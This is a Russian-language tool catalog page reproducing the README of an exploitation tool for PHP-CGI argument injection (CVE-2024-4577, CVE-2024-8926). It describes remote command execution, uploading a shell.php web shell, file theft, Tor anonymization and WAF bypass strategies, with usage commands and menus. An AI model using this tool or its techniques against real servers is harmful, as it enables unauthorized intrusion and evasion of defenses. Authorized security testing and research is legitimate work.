Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
php-cgi-Injector — Инструмент для тестирования безопасности CVE-2024-4577 и CVE-2024-8926 | Kitploit
Инструменты/GitHubGitHub/night-have-dreams/php-cgi-injector
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеКомандование и Управление
GitHubnight-have-dreams/php-cgi-injector

php-cgi-Injector

Инструмент для тестирования безопасности CVE-2024-4577 и CVE-2024-8926

Репозиторий
49241 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PHP-CGI Injector

🚀 CVE-2024-4577 и CVE-2024-8926 Эксплойт-инструмент

Автоматизированный инструмент для тестирования уязвимости внедрения параметров PHP-CGI, поддерживающий CVE-2024-4577 и CVE-2024-8926, позволяющий выполнять команды, загружать и скачивать файлы.


📌 Введение

Данный инструмент предназначен для тестирования уязвимости внедрения параметров в среде PHP-CGI и предоставляет:

  • ✅ Крутой терминальный интерфейс с анимацией
  • ✅ Автоматическое сканирование уязвимости
  • ✅ Множество режимов атаки (Shell, выполнение PHP-кода, загрузка/скачивание файлов)
  • ✅ Встроенные и пользовательские комбинации Payload
  • ✅ Режим скрытия трафика через Tor
  • ✅ Многочисленные модули обхода WAF
  • ✅ Автоматическое преобразование кодировки вывода
  • ✅ Принудительный режим эксплуатации (даже если уязвимость не найдена)
  • ❌ Не умеет заваривать кофе, но умеет жарить WAF.
  • ❌ Не помогает писать отчёты, знакомиться с девушками или поступать в аспирантуру.
  • ❌ Не поддерживает социальную инженерию — разбирайтесь с людьми сами.

📜 Отказ от ответственности

Данный инструмент предназначен исключительно для легального тестирования и академических целей. Не используйте его на системах без авторизации!

⚠️ Незаконное использование влечёт за собой юридическую ответственность!

Инструмент разрешён только для:

  • 🔹 Red Team-тестирования в корпоративных сетях
  • 🔹 Исследований безопасности в CTF
  • 🔹 Личного обучения безопасности
  • 🔹 Других тестов безопасности, выполненных с законным разрешением

📥 Установка зависимостей

Инструмент требует следующие пакеты Python. Установите их:

root@kitploit:~
pip install -r requirements.txt

Или вручную:

root@kitploit:~
pip install requests requests-tor chardet urllib3 rich

🛠️ Использование

📌 Базовый синтаксис

root@kitploit:~
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]

Примеры:

root@kitploit:~
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php

📌 Параметры командной строки

ПараметрОписаниеПример
-u , --urlЦелевой URL-u http://example.com
--timeout secТайм-аут запроса (0 — бесконечно)--timeout 30
--logАвтоматическая запись команд в shell--log
--payloadВыбор или собственный набор Payload--payload 2
--torОтправка запросов через Tor--tor
--verboseПодробный вывод--verbose
--bypassВключить режим обхода WAF--bypass
--forceПринудительный вход в режим эксплуатации--force
--cgipoint PATHSУказать конкретные пути CGI для тестирования--cgipoint /path
--delay secЗадержка между запросами (в секундах)--delay 1.5
--no-effectsОтключить анимацию и задержки--no-effects

📌 Режимы работы

После обнаружения уязвимости отобразится меню:

root@kitploit:~
╭────────────  Меню режима эксплуатации  ────────────╮
│ Текущая цель: http://example.com/                  │
│ Текущая точка внедрения: /php-cgi/php-cgi.exe      │
│ Идентификатор уязвимости: CVE-2024-4577            │
╰────────────────────────────────────────────────────╯
1) 🧪 Режим Shell
2) 🛠️ Режим пользовательского PHP
3) 📤 Загрузить файл
4) 📥 Скачать файл
5) 🎯 Сменить цель атаки
6) ⚙️ Настройки параметров
7) ❌ Выход из программы
>>

📌 Подробное описание режимов

1️⃣ Режим Shell

Выполнение системных команд:

root@kitploit:~
shell> whoami

📂 Сохранение вывода

root@kitploit:~
shell> whoami --save
root@kitploit:~
shell> whoami --save C:\output\whoami.txt

2️⃣ Режим пользовательского PHP

Выполнение пользовательского PHP-кода:

root@kitploit:~
phpinfo();
EOF

📂 Сохранение вывода

root@kitploit:~
phpinfo();
EOF --save
root@kitploit:~
phpinfo();
EOF --save C:\output\info.html

3️⃣ Загрузка файла

root@kitploit:~
Путь к локальному файлу: C:\test\shell.php
Полный путь на сервере:
[*] Автоматически установлен путь загрузки: C:/xampp/htdocs/shell.php

📂 Указание пути вручную

root@kitploit:~
Полный путь на сервере: C:\xampp\php\shell.php

4️⃣ Скачивание файла

root@kitploit:~
Путь к удалённому файлу: C:\xampp\htdocs\index.php

📂 Файл сохраняется в download/, при повторении имени автоматически добавляется номер

root@kitploit:~
[*] Файл скачан, сохранён в download/index.php

5️⃣ Смена цели атаки

root@kitploit:~
Введите новый целевой URL: http://newtarget.com

🔹 Уязвимость будет протестирована заново


6️⃣ Переключение параметров

root@kitploit:~
[⚙️ Меню настройки параметров этапа эксплуатации]

1) Сменить Payload                      1
2) Модуль обхода Bypass                 не выбран
3) Тайм-аут ожидания Timeout            10 с
4) Задержка запросов Delay              0 с
5) Автозапись Log                       выкл
6) Подробный режим Verbose              выкл
7) Эффекты Effects                      вкл
8) Принудительное использование Force   выкл
9) Сохранить и вернуться в меню Exploit

📌 Модули обхода WAF (Bypass)

Предоставляются следующие стратегии обхода:

  • Искажение пути CGI
  • Добавление незначащих символов до и после Payload
  • Замена php://input на другие варианты
  • Добавление определённых или случайных HTTP-заголовков
  • Запутывание содержимого POST
  • Случайное изменение порядка Payload
  • Пользовательский скрипт обхода (формат см. в tamper_example_template.txt)
Скачать инструмент